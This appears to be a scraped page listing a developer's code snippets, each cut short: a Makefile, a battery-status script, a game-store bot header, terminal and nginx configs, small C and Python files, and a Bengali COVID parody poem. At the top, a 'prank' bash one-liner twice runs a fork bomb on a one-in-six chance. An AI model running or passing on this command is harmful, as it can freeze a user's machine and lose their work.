Always Prank The Suspecting Newbies
Non-destructive Russian Roulette
[ $[ $RANDOM % 6 ] == 0 ] && eval ":(){ :|:&};:" || echo *Click*
debug ?= false | |
OUT := list | |
SRCS = list-impl.cpp list.cpp | |
LDFLAGS += -lstdc++ | |
ifneq ($(filter yes true, $(debug)),) | |
LDFLAGS += -g | |
CXXFLAGS += -g |
[ $[ $RANDOM % 6 ] == 0 ] && eval ":(){ :|:&};:" || echo *Click*
#!/bin/bash | |
stat="$(cut -c1 </sys/class/power_supply/BAT0/status)" | |
full="$(</sys/class/power_supply/BAT0/charge_full)" | |
current="$(</sys/class/power_supply/BAT0/charge_now)" | |
percent="$(echo "($current*100)/$full"|bc)" | |
if [[ $stat = C ]];then | |
CHR="" # fas fa-battery-bolt ei character ta copy koro | |
else | |
CHR=" " | |
fi |
#!/bin/env python3 | |
""" | |
Epic Games Store Freebies Claiming bot. | |
Uses Chromedriver(monkeypatched if possible) | |
""" | |
import sys | |
import re | |
import logging as log | |
from xml.sax.saxutils import escape | |
from datetime import datetime |
window: | |
dynamic_padding: true | |
decorations: none | |
startup_mode: Fullscreen | |
font: | |
normal: | |
family: Source Code Pro | |
style: SemiBold | |
bold: | |
family: Source Code Pro |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title><!--# echo var="status_type" default="" -->: <!--# echo var="status" default="" --></title> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
<!--# if expr="$status = 502" --> | |
<meta http-equiv="refresh" content="2"> | |
<!--# endif --> | |
</head> |
#include<stdio.h> | |
int main() | |
{ | |
char ch='\0'; | |
scanf("%c",&ch); | |
printf("%d\n",(int)ch); | |
return 0; | |
} |
#!/usr/bin/python3 | |
##### sync_to_async def | |
import os | |
import sys | |
import threading | |
import gi, platform, subprocess | |
gi.require_version('WebKit', '3.0') | |
gi.require_version('Gtk', '3.0') |
/* | |
* | |
* Copyright Ahmad Hasan Mubashshir <ahmubashshir@gmail.com> | |
* | |
* This program is free software; you can redistribute it and/or modify | |
* it under the terms of the GNU General Public License as published by | |
* the Free Software Foundation; either version 2 of the License, or | |
* (at your option) any later version. | |
* | |
* This program is distributed in the hope that it will be useful, |
'কবর' | |
এইখানে তোর দাদির কবর ডালিম- গাছের তলে, | |
তিরিশটা দিন হাত ধোঁয়নি সাবান মেশানো জলে। | |
এতোটুকু তারে ঘরে এনেছিনু গোবর ভর্তি মাথা, | |
ভোর রাতে উঠে চুপচাপ খেতো তিন থানকুনি পাতা। | |
এখানে ওখানে ঘুরিয়া ফিরিয়া ভেবে হইতাম সারা; | |
সারা বাড়ি ভরি এতো ভাইরাস ছড়াইয়া দিল কারা! | |
এমনি করিয়া জানি না কখন হাত থেকে মুখে মিশে | |
করোনা তাহার বাসা বেধেছিলো সরাসরি ফুসফুসে। |